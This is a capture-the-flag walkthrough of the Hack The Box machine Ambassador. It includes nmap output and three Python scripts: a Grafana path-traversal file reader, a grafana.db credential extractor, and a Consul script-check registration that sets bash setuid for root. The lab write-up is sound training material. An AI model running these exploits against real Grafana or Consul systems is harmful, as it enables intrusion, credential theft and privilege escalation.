In this post, I would like to share a walkthrough of the Ambassador machine from Hack The Box.
This machine is rated medium on Hack The Box.
What will you gain from the Ambassador machine?
For the user flag, you need to abuse an arbitrary file read vulnerability in Grafana: first to read its configuration file, which gives us the Grafana admin password, and then to pull its SQLite database, which gives us the MySQL credentials. Exploring the MySQL instance then yields the password of a system user.
For the root flag, you need to abuse the Consul agent running on the box: with a token recovered from a git history, we can register a service whose health check runs a script of our choosing, and Consul runs that check as root.
Information Gathering on Ambassador Machine
Once we have started the VPN connection (the .ovpn file is downloaded from Hack The Box), we can start information gathering on the machine with nmap. The scan below was run as nmap -sC -sV -oA nmap/initial 10.10.11.183, i.e. default scripts and version detection on the top 1000 ports; add -p- to cover all 65535 ports and -Pn to skip host discovery if ICMP is filtered.
# Nmap 7.92 scan initiated Tue Oct 4 08:52:26 2022 as: nmap -sC -sV -oA nmap/intial 10.10.11.183
Nmap scan report for 10.10.11.183
Host is up (0.17s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
| 256 80:a4:c5:2e:9a:b1:ec:da:27:64:39:a4:08:97:3b:ef (ECDSA)
|_ 256 f5:90:ba:7d:ed:55:cb:70:07:f2:bb:c8:91:93:1b:f6 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Ambassador Development Server
|_http-generator: Hugo 0.94.2
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 04 Oct 2022 12:53:24 GMT
| Content-Length: 29
| href="/login">Found</a>.
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 04 Oct 2022 12:52:50 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 04 Oct 2022 12:52:56 GMT
|_ Content-Length: 0
3306/tcp open mysql MySQL 8.0.30-0ubuntu0.20.04.2
|_sslv2: ERROR: Script execution failed (use -d to debug)
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 11
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsLoadDataLocal, LongPassword, IgnoreSigpipes, ConnectWithDatabase, SupportsTransactions, FoundRows, SwitchToSSLAfterHandshake, Speaks41ProtocolNew, LongColumnFlag, IgnoreSpaceBeforeParenthesis, ODBCClient, SupportsCompression, DontAllowDatabaseTableColumn, InteractiveClient, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: xl4A/\x1Cfr:8J\x19\x13P@-It\x1D\x0E
|_ Auth Plugin Name: caching_sha2_password
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.92%I=7%D=10/4%Time=633C2CA1%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,174,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nExpir
SF:es:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\r\nSet-Cookie:\
SF:x20redirect_to=%2F;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Tue,\x2004\x20Oct\x202022\x2012:52
SF::50\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<
SF:/a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(HTTPOptions,12E,"HTTP/1\.0\x20302\x20Found\r\nCac
SF:he-Control:\x20no-cache\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPra
SF:gma:\x20no-cache\r\nSet-Cookie:\x20redirect_to=%2F;\x20Path=/;\x20HttpO
SF:nly;\x20SameSite=Lax\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-O
SF:ptions:\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Tu
SF:e,\x2004\x20Oct\x202022\x2012:52:56\x20GMT\r\nContent-Length:\x200\r\n\
SF:r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Req
SF:uest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x2
SF:0close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1
SF:\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset
SF:=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSess
SF:ionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/
SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Re
SF:quest")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Ty
SF:pe:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\
SF:x20Bad\x20Request")%r(FourOhFourRequest,1A1,"HTTP/1\.0\x20302\x20Found\
SF:r\nCache-Control:\x20no-cache\r\nContent-Type:\x20text/html;\x20charset
SF:=utf-8\r\nExpires:\x20-1\r\nLocation:\x20/login\r\nPragma:\x20no-cache\
SF:r\nSet-Cookie:\x20redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity\.txt
SF:%252ebak;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protection:\x201;
SF:\x20mode=block\r\nDate:\x20Tue,\x2004\x20Oct\x202022\x2012:53:24\x20GMT
SF:\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found</a>\.\n\n"
SF:);
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct 4 08:54:41 2022 -- 1 IP address (1 host up) scanned in 135.32 seconds
Let’s access the website on port 80.
However, nothing on the Hugo site itself looks interesting for us to play with.
When we open the post, we see a note: “Use the Developer account to SSH, DevOps will give you the password”. That gives us a likely username, developer, to keep in mind.
Grafana Website Enumeration
Investigating the service on port 3000 gives us a Grafana login page (the nmap fingerprint already showed every request being redirected to /login). Sadly, we don’t have any credentials to try yet.
Looking carefully at the Grafana login page, I notice the version number at the bottom of the page.
Grafana Directory Traversal and Arbitrary File Read
After researching that version on the internet, we stumble on an exploit-db entry for a directory traversal vulnerability in Grafana: an unauthenticated path traversal through the plugin asset endpoint that lets us read arbitrary files from the server.
Let’s download the exploit to our attacker’s machine.
As we can see in the screenshot above, the exploit fails under Python 2.
However, it runs fine with python3.
Finally, the exploit works and we can read any file on the machine that the Grafana process itself can read (it runs as the grafana user, so /etc/shadow stays out of reach).
For testing purposes, we can read /etc/passwd, which looks as shown above.
After some more research, I found one website over here listing the files worth pulling from a Grafana host, starting with its configuration file /etc/grafana/grafana.ini.
At last, we obtain the admin credentials: the admin_password setting under [security] in grafana.ini.
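The traversal and the config-file parsing, as an added example written for this post rather than the exploit-db script the walkthrough downloads. It assumes the bug is the Grafana plugin-path traversal (CVE-2021-43798), that the target is 10.10.11.183:3000, and that any bundled plugin name (alertlist here) works as the prefix; the SAMPLE_INI text is constructed for the offline check and is not the box’s real configuration.

```python
"""Added example (not the original post's exploit): read a file through the
Grafana plugin-path traversal and pull admin_password out of grafana.ini.
Assumed: CVE-2021-43798 style traversal, target 10.10.11.183:3000."""
import configparser
import http.client

TARGET_HOST = "10.10.11.183"   # assumed target, the Ambassador box
TARGET_PORT = 3000
PLUGIN = "alertlist"           # any plugin shipped with Grafana works


def traversal_path(target_file: str, plugin: str = PLUGIN, depth: int = 8) -> str:
    """Build /public/plugins/<plugin>/../../<target_file>.

    http.client sends the path verbatim, so the '..' segments reach Grafana
    un-normalised; browsers and some HTTP clients would collapse them and
    the traversal would silently stop working."""
    up = "/".join([".."] * depth)
    return f"/public/plugins/{plugin}/{up}/{target_file.lstrip('/')}"


def read_file(target_file: str, host: str = TARGET_HOST, port: int = TARGET_PORT,
              timeout: int = 10) -> str:
    """Fetch one file from the target; raises if Grafana does not return 200."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", traversal_path(target_file))
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", errors="replace")
    finally:
        conn.close()
    if resp.status != 200:
        raise RuntimeError(f"{target_file}: HTTP {resp.status}")
    return body


def grafana_admin_password(ini_text: str):
    """Return admin_password from [security], or None if unset or commented.

    grafana.ini uses ';' for comment lines, '=' for assignment, and
    %(var)s references in values, hence interpolation=None."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(ini_text)
    return cp.get("security", "admin_password", fallback=None)


# Constructed stand-in for grafana.ini, used only for the offline check.
SAMPLE_INI = """
[security]
;admin_user = admin
admin_password = not-the-real-one
[database]
type = sqlite3
"""

if __name__ == "__main__":
    print(read_file("/etc/passwd"))
    print("admin password:", grafana_admin_password(read_file("/etc/grafana/grafana.ini")))
```

If the read comes back as a 404 even though the file exists, the usual cause is a client that normalised the dot segments away before sending; sending the raw path (or URL-encoding the dots) is the fix, not a deeper traversal.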
Grafana Dashboard
Logging in with the admin credentials, sadly, we don’t find anything interesting in the dashboards themselves.
From my earlier research, there is another file worth reading with the same traversal: Grafana’s SQLite database at /var/lib/grafana/grafana.db.
For a better view, we can download it to our attacker’s machine and open it with sqlite3.
Finally, in the data_source table we can see the password of the MySQL data source, which we can use to look for other users’ credentials.
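Pulling the data-source credentials out of a downloaded grafana.db, as an added example that is not part of the original post. Grafana keeps data sources in the data_source table; older rows store the password in the cleartext password column, newer ones under secure_json_data, which is encrypted with the secret_key from grafana.ini, so the script reports which case applies. The SCHEMA is trimmed to the columns used and the rows in sample_connection() are constructed values, not the contents of the box’s database.

```python
"""Added example (not from the original post): list data-source credentials
from a grafana.db copy. Usage: python3 grafana_ds.py grafana.db"""
import json
import sqlite3
import sys

# Trimmed schema: only the columns this script reads; the real table has more.
SCHEMA = """
CREATE TABLE data_source (
    id INTEGER PRIMARY KEY,
    org_id INTEGER, name TEXT, type TEXT, url TEXT,
    user TEXT, password TEXT, "database" TEXT,
    secure_json_data TEXT
);
"""


def extract_datasource_creds(conn: sqlite3.Connection) -> list:
    """Return one dict per data source with user/password and a note that
    says whether the password was cleartext, encrypted, or absent."""
    conn.row_factory = sqlite3.Row
    query = ('SELECT name, type, url, user, password, "database", secure_json_data '
             'FROM data_source ORDER BY id')
    out = []
    for row in conn.execute(query):
        entry = {k: row[k] for k in ("name", "type", "url", "user", "database")}
        if row["password"]:
            # Legacy cleartext column: exactly what we want on an old install.
            entry["password"] = row["password"]
            entry["note"] = "cleartext password column"
        else:
            secure = json.loads(row["secure_json_data"] or "{}")
            entry["password"] = None
            entry["note"] = ("encrypted in secure_json_data" if "password" in secure
                             else "no password stored")
        out.append(entry)
    return out


def sample_connection() -> sqlite3.Connection:
    """Constructed in-memory stand-in for grafana.db; every value is made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany(
        'INSERT INTO data_source (org_id, name, type, url, user, password, "database", '
        'secure_json_data) VALUES (?, ?, ?, ?, ?, ?, ?, ?)',
        [
            (1, "mysql.yaml", "mysql", "localhost:3306", "grafana",
             "example-db-password", "grafana", "{}"),
            (1, "prom", "prometheus", "http://localhost:9090", "", "", "",
             '{"password": "AAAA"}'),
        ],
    )
    conn.commit()
    return conn


if __name__ == "__main__":
    db = sqlite3.connect(sys.argv[1]) if len(sys.argv) > 1 else sample_connection()
    for entry in extract_datasource_creds(db):
        print(entry)
```

When the note says encrypted, the traversal still helps: secret_key in grafana.ini is what Grafana uses to encrypt secure_json_data, so both halves of the secret can be read through the same bug.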
MySQL Database Enumeration on Ambassador
At last, we can connect to the MySQL instance on port 3306 with the credentials we found.
There are a few databases we can investigate.
Sadly, there are no tables in the grafana database.
However, we find a users table inside the whackywidget database.
Inside that table, a different credential is saved, which we can use for further escalation.
After decoding the stored value from base64, we obtain the password for the developer user.
Finally, we can access the machine via SSH using the developer’s credentials.
We can read the user flag by executing the “cat user.txt” command.
Escalate to Root Privileges Access on Ambassador Machine
Nothing useful can be found in the /var directory.
There are two directories that look interesting to analyze further.
Inside the my-app directory, there are two directories we can analyze further.
Nothing looks interesting over here.
However, a .git directory is present inside the my-app directory.
When going through the git history (git log -p), we see a consul command in the last commit, and with it the Consul token the developers were using.
Therefore, let’s save the command “chmod u+s /usr/bin/bash” to a new file, in my case darknite.sh, and make it executable. (chmod +x only sets the execute bit, which bash already has; it is the setuid bit, u+s, that lets bash run as its owner, root.)
Using that token, we can register a new Consul service whose health check runs our script. Consul executes script checks as the user the agent runs as, which on this box is root, so the command in our file runs as root on the next check interval.
At last, bash carries the setuid bit, and “bash -p” gives us a root shell.
We can read the root flag by executing the “cat root.txt” command.
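The Consul registration step, as an added example written for this post and not the commands the walkthrough typed. It assumes the agent listens on 127.0.0.1:8500 with script checks enabled (Consul refuses Args-style checks otherwise), that the token from the git history is supplied in the CONSUL_TOKEN environment variable, and that /tmp/darknite.sh is the script holding chmod u+s /usr/bin/bash; the service name darknite is arbitrary.

```python
"""Added example (not the original post's commands): register a Consul
service whose health check runs a script we control. Consul runs script
checks as the user the agent runs as (root on Ambassador), so whatever the
script does runs as root. Assumed: agent on 127.0.0.1:8500, token in
CONSUL_TOKEN, script checks enabled on the agent."""
import json
import os
import sys
import urllib.request

CONSUL_ADDR = os.environ.get("CONSUL_HTTP_ADDR", "http://127.0.0.1:8500")
SCRIPT = "/tmp/darknite.sh"   # assumed path; contains: chmod u+s /usr/bin/bash


def service_definition(name: str, script: str, interval: str = "10s") -> dict:
    """Service with a script check. 'Args' is the current form of a script
    check; the agent runs it every `interval` under its own uid."""
    return {
        "ID": name,
        "Name": name,
        "Check": {
            "Name": f"{name}-check",
            "Args": ["/bin/sh", "-c", script],
            "Interval": interval,
            "Timeout": "5s",
        },
    }


def register(definition: dict, token: str, addr: str = CONSUL_ADDR) -> int:
    """PUT /v1/agent/service/register, the HTTP equivalent of
    `consul services register -token <token> service.json`."""
    body = json.dumps(definition).encode()
    req = urllib.request.Request(
        f"{addr}/v1/agent/service/register", data=body, method="PUT",
        headers={"Content-Type": "application/json", "X-Consul-Token": token},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status


def write_payload(script_body: str, path: str = SCRIPT) -> str:
    """Write the check script and make it executable; returns the path."""
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\n" + script_body + "\n")
    os.chmod(path, 0o755)
    return path


if __name__ == "__main__":
    token = os.environ.get("CONSUL_TOKEN")
    if not token:
        sys.exit("set CONSUL_TOKEN to the token recovered from the git history")
    path = write_payload("chmod u+s /usr/bin/bash")
    status = register(service_definition("darknite", path), token)
    print(f"registered, HTTP {status}; wait one interval, then run: bash -p")
```

A 403 from the register call means the token lacks service:write on the agent; a 400 mentioning script checks means the agent was started without enable_script_checks or enable_local_script_checks, in which case this route is closed regardless of the token.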